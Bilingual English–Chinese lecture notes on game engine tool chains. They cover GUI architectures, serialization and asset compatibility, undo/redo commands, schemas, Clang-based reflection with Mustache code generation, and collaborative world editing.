    Why Piccolo Use Clang

    webp

    One of Clang’s main goals is to provide a library-based architecture, so that the compiler could interoperate with other tools that interact with source code.

    ​Clang 的主要目标之一是提供基于库的架构,以便编译器可以与其他与源代码交互的工具进行互操作。

    Generate Schema From AST

    ​从 AST 生成模式

    webp

    • Parsing AST, such as type name, field name, field type, etc

      解析 AST,例如类型名称、字段名称、字段类型等

    • Build a temporary schema of data in memory

      在内存中构建数据的临时模式

    Precise Control of Reflection Scope

    ​精确控制反射作用域

    webp

    In the actual scenario, we need to add a lot of tag information to identify the purpose of the type.

    ​实际场景中,我们需要添加很多标签信息来标识类型的用途。

    Use Marco to Add Reflection Controls

    ​使用 Marco 添加反射控件

    webp

    Add tags by __attribute__

    ​通过 __attribute__ 添加标签

    • __attribute__ is a source code annotation provided by clang. In the code, the required data types can becaptured by using these macros.

      __attribute__ 是 clang 提供的源代码注释,在代码中可以通过这些宏来捕获需要的数据类型。

    • Define a “CLASS” macro to distinguish between precompile and compile.

      定义一个 “CLASS” 宏来区分预编译和编译。

      • When precompiling, define “__REFOECTION_PARSER__” macro in meta parser to make_the attribute information effective

        预编译时,在 meta parser 中定义“__REFOECTION_PARSER__”宏,使属性信息生效

    Reflection Accessors

    ​反射访问器

    webp

    Generate reflection accessors using schemas

    ​使用模式生成反射访问器

    • For classes, we need to generate type info getters

      对于类,我们需要生成类型信息获取器

    • For fields, we need to generate setters and getters that can access them

      对于字段,我们需要生成可以访问它们的设置器和获取器

    • For functions, we need to generate invoker that can invoke tem

      对于函数,我们需要生成可以调用 tem 的调用器

    Code Rendering

    ​代码渲染

    The same type of business code structure is the same.

    ​同类型的业务代码结构都是一样的。

    webp

    Code Rendering

    ​代码渲染

    Code Rendering is the process of collecting data (if any) and loading related templates (or sending output directly). The collected data is then applied to the associated template. The final output is sent to the user.

    ​代码渲染是收集数据(如果有)并加载相关模板(或直接发送输出)的过程。然后将收集的数据应用于相关模板。最终输出将发送给用户。

    Pros:

    ​优点

    • Strong separation of code and data

      代码和数据完全分离

    Code Rendering-Mustache

    ​代码渲染-Mustache

    webp

    Mustache is a web template system.

    ​Mustache 是一个 Web 模板系统。

    It is named “Mustache” because of heavy use of braces, {{}}, that resemble a sideways moustache.

    ​它被命名为“Mustache”,因为它大量使用了括号 {{}},类似于侧胡子。

    Use Mustache to Code Generation

    ​使用 Mustache 进行代码生成

    webp

    • Implementing business logic using mustache templates

      使用 Mustache 模板实现业务逻辑

    • Generate code through mustache rendering

      通过 Mustache 渲染生成代码

    Collaborative Editing

    ​协作编辑

    ​一个游戏开发项目可能需要多个人来协作编辑。

    Bottlenecks in Large Projects

    ​大型项目的瓶颈

    webp

    • Lots of people work with lots of assets

      许多人使用大量资产

    • Assets version management is very difficult

      资产版本管理非常困难

    Merging Conflicts is The Biggest Problem

    ​合并冲突是最大的问题

    webp

    • Everyone needs to spend a lot of time on merging conflicts when updating or uploading assets

      每个人在更新或上传资产时都需要花费大量时间解决合并冲突

    How to Reduce Conflicts

    ​如何减少冲突

    • Split assets into smaller parts to reduce the probability of conflicts

      将资产拆分成更小的部分以减少冲突的可能性

      • Layering the world

        分层世界

      • Divide the world

        划分世界

      • One file per actor (OFPA)

        每个演员一个文件 (OFPA)

    • All people work in the same scene to completely eliminate the conflict

      所有人都在同一个场景中工作以完全消除冲突

    Split Assets-Layering the World

    ​拆分资产 - 分层世界

    webp

    • Split the world into many layers, each of which is stored in an asset file

      将世界拆分成多个层,每个层都存储在资产文件中

    • Different people work at different levels

      不同的人在不同的层面上工作

    Pros

    • Appropriate layers would decrease edit confliction

      适当的层会减少编辑冲突

    • Layer-based logic available

      提供基于层的逻辑

    Cons

    • Layer logic may dependents on another layer

      层逻辑可能依赖于另一层

    • Difficult to reasonably split layers when the world is very complex

      当世界非常复杂时,很难合理地拆分层

    Split Assets- Divide the World

    ​分割资产 - 划分世界

    webp

    • The world is divided into fixed size blocks, and each block is saved in an asset file

      世界被划分为固定大小的区块,每个区块都保存在资产文件中

    • Different people work at different blocks

      不同的人在不同的区块工作

    Pros

    • Location based splitting makes it easy to dynamically expand the world

      基于位置的分割使动态扩展世界变得容易

    • Space separating is more intuitive to operator

      空间分离对操作员来说更直观

    Cons

    • Difficult to deal with objects across multiple blocks

      难以处理跨多个块的对象

    One File Per Actor

    ​每个 Actor 一个文件

    webp

    A splitting method proposed by unreal5

    ​unreal5 提出的一种拆分方法

    • reduces overlap between users by saving data for instances of Actors in external files, removing the need to save the main Level file when making changes to its Actors

      通过将 Actor 实例的数据保存在外部文件中来减少用户之间的重叠,无需在更改 Actor 时保存主关卡文件

    • All Actors are embedded in their respective Level files when cooked

      烘焙后,所有 Actor 都嵌入到各自的关卡文件中

    A Special Way to Split Assets-OFPA

    ​资产分割的特殊方法-OFPA

    webp

    Pros

    • Fine-grained scene division, fewer edit confliction

      场景划分细粒度,编辑冲突更少

    • Only need to save objects modified

      只需保存修改的对象

    Cons

    • Massive files to manage, more burden for version control

      需要管理大量文件,版本控制负担更重

    • Cook will be slow down while embedding many OFPA files to level file

      将许多 OFPA 文件嵌入关卡文件时,Cook 速度会变慢

    Coordinate Editing in One Scene

    ​在一个场景中协调编辑

    webp

    Connect multiple instances of world editor together to work collaboratively in a shared editing session, building a single virtual world together with your teammates and colleagues in real time.

    ​将多个世界编辑器实例连接在一起,在共享编辑会话中协同工作,实时与您的队友和同事一起构建一个虚拟世界。

    How to Synchronize My Operations with Others

    ​如何将我的操作与他人同步

    webp

    Do you remember command system?

    ​你还记得命令系统吗?

    • Serialize my commands and send them to server

      序列化我的命令并将其发送到服务器

    • Receive commands from server and deserialize them

      从服务器接收命令并反序列化它们

    • Invoke commands

      调用命令

    There is A Very Big Challenge

    ​有一个非常大的挑战

    How to ensure the consistency of distributed operations?

    ​如何保证分布式操作的一致性?

    webp

    Undo/Redo

    webp

    Operation Merge

    Two Users Cannot Edit The Same instance at The Same Time

    ​两个用户不能同时编辑同一个实例

    Instance lock: Avoid multiple people modifying the same instance at the same time

    实例锁:避免多人同时修改同一个实例

    webp

    Two Users Cannot Edit The Same Asset at The Same Time

    ​两个用户不能同时编辑同一资产

    webp

    Asset lock: Avoid multiple people modifying the same asset at the same time

    资产锁定:避免多人同时修改同一资产

    But Lock is not Omnipotent

    webp

    If there are three users working in the same world, and now User2 presses the undo button, what do we expect to happen? lf he presses the redo button next?

    ​如果有三个用户在同一个世界中工作,现在用户 2 按下了撤消按钮,我们期望发生什么?如果他接下来按下重做按钮?

    How to Solve These Problems Thoroughly

    ​如何彻底解决这些问题

    Operation Transform (OT): Abstract the operation into an operation sequence consisting of an enumerable N atomic operation types

    操作转换 (OT):将操作抽象为由可枚举的 N 个原子操作类型组成的操作序列

    Conflict-free Replicated Data Type(CRDT): A data structure that is replicated across multiple computers in a network, with the following features:

    无冲突复制数据类型 (CRDT):在网络中的多台计算机上复制的数据结构,具有以下特点:

    • The application can update any replica independently, concurrently and without coordinating with otherreplicas

      应用程序可以独立、并发地更新任何副本,而无需与其他副本协调

    • An algorithm (itself part of the data type) automatically resolves any inconsistencies that might occur

      算法(本身是数据类型的一部分)会自动解决可能发生的任何不一致问题

    • Although replicas may have different state at any particular point in time, they are guaranteed to eventually converge

      虽然副本在任何特定时间点可能具有不同的状态,但它们最终会收敛

    Traditional Workflow vs. Collaborative Editing Workflow

    ​传统工作流程与协作编辑工作流程

    webp

    Traditional Workflow

    webp

    Collaborative Editing Workflow

    Server is the Most Important Role

    ​服务器是最重要的角色

    webp

    Client

    ​客户端

    • Crash

      崩溃

    • Maloperation

      操作不当

    Server

    ​服务器

    • Crash

      崩溃

    • The server retains each session untithe user who createdthe session
      expressly deletes it, or until the server itself is shut down.

      服务器保留每个会话,直到创建会话的用户明确删除它,或直到服务器本身关闭。

    • Save session records to disk

      将会话记录保存到磁盘

    References

    ]]>
    + 资源

    课程

    第十三节:引擎工具链基础

    Outline of Tool Chains

    Foundation of Tool Chains

    • What is Game Engine Tool Chains

      什么是游戏引擎工具链

    • Complicated Tool GUI

      复杂的工具 GUI

    • How to Load Asset -Deserialization

      如何加载资产-反序列化

    • How to Make a Robust Tools

      如何制作强大的工具

    • How to Make Tool Chain

      如何制作工具链

    • What You See is What You Get

      所见即所得

    • One More Thing - Plugin

      还有一件事 - 插件

    Applications & Advanced Topic

    • Common Game Production Workflow

      常见的游戏制作工作流程

    • Common Editors

      常见的编辑

    • Reflection

      反射

    • Collaborative Editing

      协作编辑

    What is Game Engine Tool Chain

    ​什么是游戏引擎工具链?

    Layer Between Users and Engine Runtime

    ​用户和引擎运行时之间的层。让用户更好地操作游戏引擎写游戏。

    webp

    Bridge Between DCC Tools and Game Engine

    ​DCC 工具和游戏引擎之间的桥梁

    webp

    ​让游戏引擎能够读取用户使用各种工具创造的艺术资源。

    Let Huge Different Mindset Users Work Together

    ​让不同心态的用户共同合作

    webp

    For Designers

    对于设计师

    • lterate the gameplay quickly

      快速迭代游戏玩法

    • Implement game logic prototype quickly even without programming

      无需编程即可快速实现游戏逻辑原型

    • Edit massive data easily

      轻松编辑海量数据

    For Artists

    对于艺术家

    • The quality of the result

      结果质量

    • Convenient workflow

      便捷的工作流程

    • What you see is what you get (WYSIWYG)

      所见即所得 (WYSIWYG)

    Complicated Tool GUI

    ​复杂的工具 GUI

    Graphics User interface (GUI)

    ​图形用户界面 (GUl)

    webp

    GUl is getting more and more complex

    ​GUI 越来越复杂

    • Fast iteration

      快速迭代

    • Separation of design and implementation

      设计和实现分离

    • Reusability

      可重用性

    Immediate Mode

    webp

    • The client calls cause rendering of graphics objects to the display.

      客户端调用导致图形对象渲染到显示器。

    • the data to describe rendering primitives is inserted frame by frame directly from the client into a command list.

      描述渲染图元的数据直接从客户端逐帧插入到命令列表中

    1
    Imgui::DrawButton("hello", 12, 24, &callback_func);

    webp

    Characteristic

    ​特点

    • Lightweight

      轻量级

    • Procedural programming

      程序化编程

    • Widgets don’t maintain any data or state

      小部件不维护任何数据或状态

    Pros

    ​优点

    • Straightforward

      直接

    • Simple

      简单

    • Quick prototype

      快速原型

    Cons

    ​缺点

    • Poor scalability

      可扩展性差

    • Poor performance

      性能差

    • Poor maintainability

      可维护性差

    Examples

    ​示例

    • Unity UGUI
    • Omniverse GUl
    • Piccolo GUl

    Retained Mode

    ​保留模式

    webp

    • The graphics library, instead of the client retains the scene to be rendered.

      图形库,而不是客户端保留要渲染的场景。

    • The client calls into the graphics library do notdirectly cause actual rendering, but make useof extensive indirection to resources, managedby the graphics library.

      客户端调用图形库不会直接导致实际渲染,而是利用图形库管理的大量间接资源。

    1
    2
    3
    4
    5
    6
    7
    HorizontalLayout layout = new HorizontalLayout();
    Button button = new Button();
    button.setText("Hello!");
    button.setwidth(12);
    button.setHeight(24);
    button.setcallback(&callback_func);
    layout.Add(button);

    webp

    Characteristic

    ​特点

    • Object-oriented

      面向对象

    • Widgets contain their own state and data

      小部件包含自己的状态和数据

      • Draw widgets as needed

        根据需要绘制小部件

      • Complicated effects (animation et.al.)

        复杂效果(动画等)

    Pros

    ​优点

    • High scalability

      高可扩展性

    • High performance

      高性能

    • High maintainability

      高可维护性

    Cons

    ​缺点

    • Complex for developers

      对开发人员来说很复杂

      • Message queue / callbacks

        消息队列 / 回调

      • Synchronization between GUI and application

        GUI 和应用程序之间的同步

    Design Pattern-MVC

    webp

    ​用户借助 Controller 操作 Model,Model 更新 View 给用户看。

    Invented by Trygve Reenskaug in 1978, to bridge the gap between the human user’s mental model and the digital model that exists in the computer.

    ​由 Trygve Reenskaug 于 1978 年发明,用于弥合人类用户的心理模型与计算机中存在的数字模型之间的差距。

    Model: The central component of the pattern, responsible for managing the dataof the application.

    模型:模式的核心组件,负责管理应用程序的数据。

    View: Any representation of information such as a chart, diagram or table.

    视图:任何信息表示形式,例如图表、图解或表格。

    Controller: Accepts input and converts it to commands for the model or view.

    控制器:接受输入并将其转换为模型或视图的命令。

    Design Pattern-MVP

    The evolution of the MVC design pattern, wherein the controller is replaced by the presenter.

    ​MVC 设计模式的演变,其中控制器被演示者取代。

    webp

    ​不同于 MVC,这次使用双向箭头。

    Model: An interface defining the data to be displayed or otherwise acted upon in the user interface.

    模型:定义要在用户界面中显示或以其他方式执行的数据的接口。

    View: A passive interface that displays data (the model) and routes user commands (events) to thepresenter to act upon that data.

    视图:显示数据(模型)并将用户命令(事件)路由到演示者以对该数据执行操作的被动接口。

    Presenter: Acts upon the model and the view. lt retrieves data from repositories (the model), andformats it for display in the view.

    演示者:对模型和视图执行操作。它从存储库(模型)检索数据,并将其格式化以在视图中显示。

    Design Pattern-MVVM

    A variation of Model / View / Controller (MVC)

    webp

    In MVVM,View is the responsibility of a designer rather than a classic developer.

    ​在 MVVM 中,View 是设计师而非传统开发人员的职责。

    The designer is generally a more graphical,artistic focused person, and does lessclassic coding than a traditional developer.

    ​设计师通常更注重图形和艺术,与传统开发人员相比,他们较少进行传统编码。

    webp

    View: using a WYSlWYG tool such as Dreamweaver, VS Blend and save as html/xaml , view state that MVC encodes in its View classes is not easy to represent.

    View:使用 Dreamweaver、VS Blend 等所见即所得工具并保存为 html/xaml,MVC 在其 View 类中编码的视图状态不易表示。

    Binding: bind View Data to the Model ,no more code in View classes.

    Binding:将 View 数据绑定到 Model,View 类中不再有代码。

    ViewModel-Model of View: The Model is very likely to have a data types that cannot be mapped directly to controls,ViewMlodel contains data-transformers that convert Model types into View types.

    ViewModel-View 的模型:Model 很可能具有无法直接映射到控件的数据类型,ViewMlodel 包含将 Model 类型转换为 View 类型的数据转换器。


    Pros

    ​优点

    • Independent development

      独立开发

    • Easy to maintain and test

      易于维护和测试

    • Easy to reuse components

      易于重用组件

    Cons

    ​缺点

    • For simple UI, MVVM can be overkill

      对于简单的 UI,MVVM 可能有点过头了

    • Data-binding is declarative and harder to debug

      数据绑定是声明性的,更难调试

    Serialization and Deserialization

    ​序列化与反序列化

    webp

    Serialization is the process of translating a data structure or object state into a format that can be stored (for example, in a file ormemory data buffer) or transmitted (for example, over a computer network) and reconstructed later.

    ​序列化是将数据结构对象状态转换为可存储(例如,在文件或内存数据缓冲区中)或传输(例如,通过计算机网络)并在稍后重建的格式的过程。

    Deserialization is the opposite operation,extracting a data structure from a series ofbytes.

    反序列化是相反的操作,从一系列字节中提取数据结构。

    Text Files

    webp

    ​使用文本文档设计的对象数据结构。

    • Save data as text files
    • Example: TXT, Json, YAML, XML…
    • Can read by common text editors

    Engine applications:

    • Unity Editor(optional): subset of YAML
    • Piccolo: Json
    • Cryengine: XML/Json (optional)

    Binary Files

    webp

    • Save data as bytes stream

      将数据保存为字节流

    • Need additional tools for read/write

      需要额外的读/写工具

    • Example: UAsset, FBX Binary

      示例:UAsset、FBX 二进制

    Engine applications:

    • Unity Runtime, Unity Editor (optional 可选)
    • CryEngine (optional 可选)
    • Unreal: UAsset

    Storage Comparison -Text vs. Binary

    ​存储比较 - 文本与二进制

    webp

    ​文本可读性好但是占用空间大,读取速度慢。二进制体积小,性能好但是可读性差,不便于调试。

    Asset Data Repeatance

    ​资源数据重复

    webp

    Meshes which in the red boxes are redundant data.

    ​红框内的网格是冗余数据。

    How do game developers solve the problem?

    ​游戏开发者如何解决这个问题?

    Asset Reference

    ​资产引用

    webp

    Assets Reference is a way to separate redundant data into asset files and complete association by establishing reference relationships.

    ​资产引用是一种将冗余数据分离到资产文件中,通过建立引用关系完成关联的方式。

    Object instance in Scene

    ​场景中的对象实例

    webp

    Data instance is a way to create a parent data that you can use as a base to make a wide variety of different children and can also be used directly.

    数据实例是一种创建父数据的方法,您可以将其用作基础来制作各种不同的子数据,也可以直接使用。

    Object instance Variance

    ​对象实例变化

    webp

    How to change the texture of Ground1 from stone to castle stone?

    ​如何将 Ground1 的纹理从石头更改为城堡石头?

    Build Variance by Copying

    ​通过复制构建差异

    webp

    Intuitive way: make a copy of instance data, modify the copy

    ​直观的方式:复制实例数据,修改副本

    • add lots of reduntant data

      添加大量冗余数据

    Build Variance by Data Inheritance

    ​通过数据继承构建差异

    webp

    Data lnheritance: lnherit the data of the inherited object and allow overriding assignments to thedata defined in its data structure.

    数据继承:继承继承对象的数据并允许覆盖其数据结构中定义的数据的分配。

    How to Load Asset-Deserialization

    ​如何加载资产反序列化

    Parse Asset File

    ​解析资产文件

    webp

    How to know how to instantiate A or fields?——Store the type of A and fields

    ​如何知道实例化 A 或字段?——存储 A 和字段的类型

    Build Key-Type-Value Pair Tree

    ​构建键-类型-值对树

    webp

    Binary vs. Text

    ​二进制与文本

    webp

    Where to store the objects and fields type?

    ​将对象和字段类型存储在哪里?

    • Text: store in asset

      文本:存储在资产中

    • Binary: store in a table

      二进制:存储在表中

    Endianness

    ​不同的硬件架构有不同的字节序。

    webp

    Big Endian: begin with most significant byte end with least significant byte

    ​大端序:以最高有效字节开始,以最低有效字节结束

    Little Endian: begin with least significant byte end with most significant byte

    ​小端序:以最低有效字节开始,以最高有效字节结束

    Endianness vary among different processors

    ​不同处理器的字节序各不相同

    ProcessorEndianness
    PowerPC (PPC)Big Endian
    Sun SparcBig Endian
    IBM S/390Big Endian
    Inel x86 (32 bit)Little Endian
    Intel x86_64 (64 bit)Little Endian
    ARMBi (Big / Little) Endian

    Unreal:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    /**
    Returns true if data larger than 1 byte shouldbe swapped to deal with endian mismatches.
    如果应交换大于 1 字节的数据来处理字节序不匹配问题,则返回 true。
    */
    FORCEINLINE bool IsByteSwapping()
    {
    #if PLATFORM LITTLE ENDIAN
    bool SwapBytes = ArForceByteSwapping;
    #else
    bool SwapBytes = this->IsPersistent();
    #endif
    return SwapBytes;
    }

    Asset Version Compatibility

    ​资源版本兼容性

    webp

    Add or Remove Field

    ​添加或删除字段

    origin class:

    1
    2
    3
    4
    5
    6
    7
    class GameObject
    {
    private:
    GUID guid;
    string name;
    Transform transform;
    }

    old data:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    {
    "guid": "092xtwg2u4ik1359",
    "name":"Alice",
    "transform": {
    "position": {
    "x": 0,
    "y": 0,
    "Z": -0.1
    }
    "rotate": {},
    "scale": {
    "x": 1,
    "y": 1,
    "z": 1
    }
    }
    }

    updated class 1

    1
    2
    3
    4
    5
    6
    class Gameobject
    {
    private:
    GUID guid;
    string name;
    }

    updated class 2

    1
    2
    3
    4
    5
    6
    7
    class Gameobject {
    private:
    GUID guid;
    string name;
    Transform transform;
    BoundingBox bbox;
    }

    Solve Compatibility by Version Hardcode

    ​通过版本硬编码解决兼容性问题

    Unreal: add version to asset

    ​Unreal:将版本添加到资产

    • Load asset: check if field exists then load data

      加载资产:检查字段是否存在,然后加载数据

    • Save asset: write all data to asset file

      保存资产:将所有数据写入资产文件

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    class Gameobject:
    int x = default;
    float y= default;
    bool z= default; // new field

    function Deserialize(data):
    x = data.GetValue<int>("x");
    y = data.GetValue<float>("y");
    if(GetCurrentVersion() >= data.version){
    z= data.GetValue<bool>("z");
    }

    function Serialize(data):
    data.SetValue<int>("x", x);
    data.setValue<float>("y", y);
    data.SetValue<bool>("z" z);
    data.UpdateVersion(GetcurrentVersion());

    Solve Compatibility by Field UID

    ​通过字段 UID 解决兼容性问题

    Google protocol buffers:

    ​Google 协议缓冲区:

    ​unique number for field

    ​字段的唯一编号

    • Every field has a unique number, never change the number.

      每个字段都有一个唯一编号,永远不要更改该编号。

    • Serialization:

      序列化:

      1. For every field, generate a “key” (fixed size) according toits field number and type.

        对于每个字段,根据其字段编号和类型生成一个“键”(固定大小)。

      2. Store field data with key, key is stored in the first few bytes

        使用键存储字段数据,键存储在前几个字节中

    • Deserialization:

      反序列化:

      1. Field not in schema but in data:key would not be recognized, skip the field.

        字段不在架构中但在数据中:键将无法识别,跳过该字段。

      2. Field in schema but not in data: set default value.

        字段在架构中但不在数据中:设置默认值。

    1
    2
    3
    4
    5
    message PrefabobjectBinary{
    string guid = 1;
    string_file_name = 2;
    repeated string_game_object_guid_list = 3;
    }

    webp

    How to Make a Robust Tools

    ​如何制作一个鲁棒的游戏引擎?

    • Undo & Redo

      要有 Ctrl + Z 和 Ctrl + Y 的功能

    • Crash Recovery

      程序崩溃时能够回档

    Command

    webp

    • Abstract all user operations to atomic commands which can invoke, revoke and serialize, deserialize.

      将所有用户操作抽象为可以调用、撤销、序列化、反序列化的原子命令。

    Command-Definition

    • ICommand<TData> provide a basic abstraction of the command.

      ICommand<TData> 提供命令的基本抽象。

    • Every system (which want to support undo/redo/crash recory …) needs to implement the system related commands inherantanced from lCommand<TData>.

      每个系统(想要支持撤消/重做/崩溃恢复…)都需要实现从 lCommand<TData> 继承的系统相关命令。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    public interfaceICommand<TData>
    {
    long UID { get; set; }
    TData Data { get; set;}
    void Invoke();
    void Revoke();
    byte[] Serialize();
    void Deserialize(byte[] data);
    }

    Command-UID

    Commands need strictly follow the sequence when recovery from disk

    ​从磁盘恢复时命令需要严格遵循顺序

    • Monotonic increase over time

      随时间单调增加

    • Unique identification

      唯一标识

    Command Serialize and Deserialize

    ​命令序列化和反序列化

    • Provide functions to serialize command instance to data and deserialize data to command instance.

      提供将命令实例序列化为数据和将数据反序列化为命令实例的函数。

    • TData type needs to provide serialize anddeserialize interface.

      TData 类型需要提供序列化和反序列化接口。

    Three key Commands

    ​三个关键命令

    • Add

      • Data: Usually data is a copy of the runtime instance

        通常数据是运行时实例的副本

      • Invoke: Create a runtime instance with data

        使用数据创建运行时实例

      • Revoke: Delete the runtime instance

        删除运行时实例

    • Delete

      • Data: Usually data is a copy of the runtime instance

        通常数据是运行时实例的副本

      • Invoke: Delete the runtime instance

        删除运行时实例

      • Revoke: Create a runtime instance with data

        使用数据创建运行时实例

    • Update

      • Data: Usually data is the old and new values of the modified properties of the runtime instance andtheir property names

        通常数据是运行时实例修改属性的新旧值及其属性名称

      • Invoke: Set the runtime instance property to the new value

        将运行时实例属性设置为新值

      • Revoke: Set the runtime instance property to the old value

        将运行时实例属性设置为旧值

    How to Make Tool Chain

    Various Tools for Different Users

    webp

    • Different viewes for different tools

      不同工具有不同的视图

    • Each tool has it’s owner datastructure

      每个工具都有其所有者数据结构

    • Same data may have different view for different user

      同一数据可能对不同用户有不同的视图

    Develop all Tools Seperately?

    ​单独开发所有工具?

    Simplest Way

    ​最简单的方法

    • No Scalability

      没有可扩展性

    • No maintainbility

      没有可维护性

    Find Common Building Blocks

    ​寻找共同的构建块

    webp

    Any complex structure is made up of simple structures, we just need a standard language to describe it.

    ​任何复杂的结构都是由简单的结构组成的,我们只需要一种标准的语言来描述它。

    Schema-A Description Structure

    ​Schema-A 描述结构

    webp

    A data schema is the formal description of the structures your system is working with.

    数据模式是系统正在使用的结构正式描述

    Standardizing the world description language

    ​标准化世界描述语言

    • Unified the data processor

      统一数据处理器

    • Normalized data between different tools

      不同工具之间的标准化数据

    • Ability to automatically generate standardized Ul

      能够自动生成标准化 UI

    Schema-Basic Eements

    ​Schema-基本元素

    webp

    Abstraction of the basic building block of the world

    ​世界基本构成块的抽象

    • Atomic Types: Int, Float, Double …

      原子类型:Int、Float、Double…

    • Class Type: Use atomic types to present complex data structure

      类类型:使用原子类型呈现复杂的数据结构

    • Containers: Array, Map

      容器:Array、Map

    Schema-Inheritance

    Abstraction of the inheritance relationship of the world

    ​世界继承关系的抽象

    webp

    1
    2
    3
    class A {/*...*/};
    class B:A {/*...*/};
    class C:A {/*...*/};

    Schema-Data Reference

    Abstract of the reference relationship of the world

    ​世界引用关系的抽象

    webp

    In the code, we need to read the data through the file path and instantiate it into the corresponding file class.

    ​在代码中我们需要通过文件路径读取数据,并实例化成对应的文件类。

    Schema - 2 Definition Ways

    webp

    Standalone schema definition file

    ​独立的架构定义文件

    Pros

    ​优点

    • Comprehension easily

      易于理解

    • Low coupling

      低耦合

    Cons

    ​缺点

    • Ease to mismatch between engine version and schema version

      引擎版本和架构版本容易不匹配

    • Difficult to define function in the structure

      难以在结构中定义函数

    • Need to implement complete syntax

      需要实现完整的语法

    Defined in code

    ​在代码中定义

    Pros

    ​优点

    • Ease to accomplish Function reflection

      易于实现函数反射

    • Natural support for inheritance relationships

      自然支持继承关系

    Cons

    ​缺点

    • Difficult to understand

      难以理解

    • High coupling

      高耦合

    Three Views For Engine Data

    webp

    ​数据以三个形式存在:存储器中、运算器中,还要便于用户理解。

    Runtime View

    ​运行时视图

    Focus:

    ​重点:

    • Read at a faster speed

      以更快的速度阅读

    • Calculate at a faster speed

      以更快的速度计算

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    class RuntimeSpotlight
    {
    public:
    // Spot Light Translation Matrix
    Matrix4x4 light trans {Matrix4x4::IDENTITY};
    // Spot Light Cone
    float inner_cone_radian = 0.0f;
    float outer_cone radian = 0.0f;
    // Spot Light intensity and units
    float intensity = 0.0f;
    LightUnits unit= CANDELA;
    // Spot Light Color
    Vector4 light color {Vector4::ZERO};
    // other light data like shadow...
    }

    Storage View

    Focus:

    ​重点:

    • Write at a faster speed

      写入速度更快

    • Occupies less hard disk space

      占用更少的硬盘空间

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    "Position:X": 1.0,
    "Position:Y": 1.0,
    "Position:Z": 1.0
    "Rotation:X": 0.0,
    "Rotation:Y": 0.0,
    "Rotation:Z": 0.0,
    "Rotation:W" : 1.0,
    "Scale:X": 1.0,
    "Scale:Y": 1.0,
    "Scale:Z": 1.0,
    // cone degree
    "inner cone_degree": 30,
    "outer cone_degree": 60,
    //sds
    "intensity": 0.0,
    "unit": 1
    //other data..

    Tools View

    webp

    Focus:

    ​重点:

    • More understandable form

      更易理解的形式

    • The need for multiple editing modes

      需要多种编辑模式

    Other Point:

    ​其他点:

    Tool data does not generally exists. Usually, special processing is done when the UI interface is generated

    ​工具数据一般不存在,通常在生成 UI 界面时进行特殊处理

    Tools View - Understandable

    webp

    ​比如,计算中使用弧度,但给用户一般使用角度。

    Too View-Various Editor Nodes

    ​Too View-各种编辑器节点

    webp

    Different edit mode for groups with different needs

    ​针对不同需求的群体提供不同的编辑模式

    What You See is What You Get (WYSIWYG)

    ​所见即所得

    User Friendly for Artists

    User Friendly for Designer

    Stand-alone Tools

    webp

    Stand-alone Tools is a kind of tool that canrun independently of the engine.

    独立工具是一种可以独立于引擎运行的工具。将 Tool Layer 与其他层并列。

    Pros

    ​优点

    • Suitable for use as a DCC tool plug-in

      适合用作 DCC 工具插件

    • Easy to start developing tools

      易于上手开发工具

    Cons

    ​缺点

    • Difficult to achieve WYSIWYG

      难以实现所见即所得

    In Game Tools

    webp

    In Game Tools is a kind of tool based on engineruntime system work.

    游戏内工具 是一种基于引擎运行时系统工作的工具。将 Tool Layer 置于顶层。

    Pros

    ​优点

    • Access to all engine data directly

      直接访问所有引擎数据

    • Easy to preview the game in the editor

      易于在编辑器中预览游戏

    • Easy to make live in-game editing

      易于进行实时游戏内编辑

    Cons

    ​缺点

    • Complex engine architecture

      引擎架构复杂

    • Requires a complete engine Ul system to makethe editor Ul

      需要完整的引擎 UI 系统才能制作编辑器 UI

    • When the engine is crashing, the tools become unusable as well

      当引擎崩溃时,工具也会变得无法使用

    In Game Tools-Editor Mode

    ​游戏工具-编辑器模式

    webp

    Editor Mode: Support to modify and preview scene data

    编辑器模式:支持修改和预览场景数据(如 Unity 在运行时调试)

    • Real time preview of scene data modification

      实时预览场景数据修改

    • Logic systems do not tick, so there are more hardware resources to display more scene details

      逻辑系统不勾选,因此有更多的硬件资源来显示更多的场景细节

    Play in Editor (PIE)

    ​在编辑器中玩游戏 (PIE)

    PIE: Directly play game in editor, no need to close editor and start game mode

    PIE:直接在编辑器中玩游戏,无需关闭编辑器并启动游戏模式

    • Save loading time

      节省加载时间

    • The continuity of creation is maintained

      保持创作的连续性

    • Quickly test modifications

      快速测试修改

    Two implemation ways

    ​两种实现方式

    • Play in editor world: Start gameplay systems tick in editor world and play in it

      在编辑器世界中玩游戏:在编辑器世界中启动游戏系统并在其中玩游戏

    • Play in PIE world: Duplicate editor world to create a PlE world and play in it

      在 PIE 世界中玩游戏:复制编辑器世界以创建 PlE 世界并在其中玩游戏

    PIE Mode -Play in Editor World

    ​PIE 模式 - 在编辑器世界中游戏

    webp

    Pros

    ​优点

    • Easy architecture tools layer

      简单的架构工具层

    • Quick state change

      快速状态更改

    Cons

    ​缺点

    • Game mode may cause data changes

      游戏模式可能导致数据更改

    Example

    ​示例

    • Piccolo

    PIE Mode -Play in PIE World

    ​PIE 模式 - 在 PIE 世界中游戏

    webp

    Pros

    ​优点

    • Data separation

      数据分离

    • Easy to instantiate multiple game instances Cons

      易于实例化多个游戏实例

    Cons

    ​缺点

    • Architecture complex

      架构复杂

    Example

    • Unreal

    One More Thing - Plugin

    ​还有一件事 - 插件

    ​游戏引擎开发者不可能顾虑到所有可能的游戏开发情况,允许插件扩展游戏引擎的功能。

    Extensibility

    ​可扩展性

    Different games need different customization of engine tools.

    ​不同的游戏需要对引擎工具进行不同的定制。

    Engine tools use plug-in mechanism to satisfy the needs.

    ​引擎工具使用插件机制来满足需求。

    Plug-in-Showcases

    webp

    Plug-in - Framework

    webp

    Plug-in : A software component that adds a specific feature to an existing computer program.

    插件:为现有计算机程序添加特定功能的软件组件。

    PluginManager: Manage plugin loading and unloading.

    PluginManager:管理插件的加载和卸载。

    Interface: A series of abstract classes provided to plug-ins, plug-ins can choose to instantiate different classes to realize the development of corresponding functions.

    Interface:提供给插件的一系列抽象类,插件可以选择实例化不同的类来实现相应功能的开发。

